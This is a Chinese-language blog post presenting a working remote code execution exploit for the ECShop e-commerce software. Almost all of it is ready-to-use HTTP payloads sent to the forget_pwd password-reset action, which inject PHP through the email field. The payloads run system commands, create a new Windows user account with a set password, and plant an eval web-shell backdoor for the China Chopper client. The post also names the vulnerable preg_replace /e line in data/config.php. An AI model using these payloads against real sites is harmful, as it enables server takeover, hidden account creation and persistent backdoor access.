我喜欢黑夜,喜欢网络安全,孤独寂寞的黑夜里,我只需要,一包烟,一台笔记本...
更多
首  页>>JAVA安全开发>> 漏洞信息ecshop远程代码执行漏洞exp
ecshop远程代码执行漏洞exp
3862
0推荐
0评论

ecshop 版本不祥 貌似09

system 权限


act=forget_pwd&action=get_pwd&email=${@print(system('net user'))}&user_name=furybijj


无果


去掉system之后改%60


act=forget_pwd&action=get_pwd&email=$%7B@print(%60net user SUPPORT_388945a1 lifelongz%60)%7D&user_name=furybijj


果断成功


其实这个也可以直接用菜刀 connect.


在配置里写下:


www.xxxx.com


act=forget_pwd&action=get_pwd&email=${eval($_POST[test])}&user_name=furybijj


主要利用代码如下:


act=forget_pwd&action=get_pwd&email=%24%7b%40print%28%60net%20user%60%29%7d&user_name=furybijj


act=forget_pwd&action=get_pwd&email=%24%7b%40eval%28%24_POST%5bfuck%5d%29%7d&user_name=furybijj


漏洞的原因是


data/config.php


define('EC_CHARSET','utf-8');


@preg_replace("/[email]/e",$_POST['email'],"error");
已经有 ( 0 ) 位网友对此发表了自己的看法,你也评一评吧! 此文不错,我要推荐-->    推 荐
欢迎参与讨论,请在这里发表您的看法、交流您的观点@禁止各种脚本

  • 点击Top
  • 推荐Top
  • 评论Top
更 多>>
本站采用Java语言开发,Spring框架,欢迎朋友们提意见。重新对页面进行布局,修改了程序,方便开源使用,由于本人美工真的不行 ,很少用背景图片,页面基本都用背景色...
主题:无色无味 | 网站地图|
Copyright (c) 2012-2013 www.shack2.org All Rights Reserved. | 空ICP备111111111号 | 程序设计: shack2 Powered by SJBlog v1.0 联系QQ:1341413415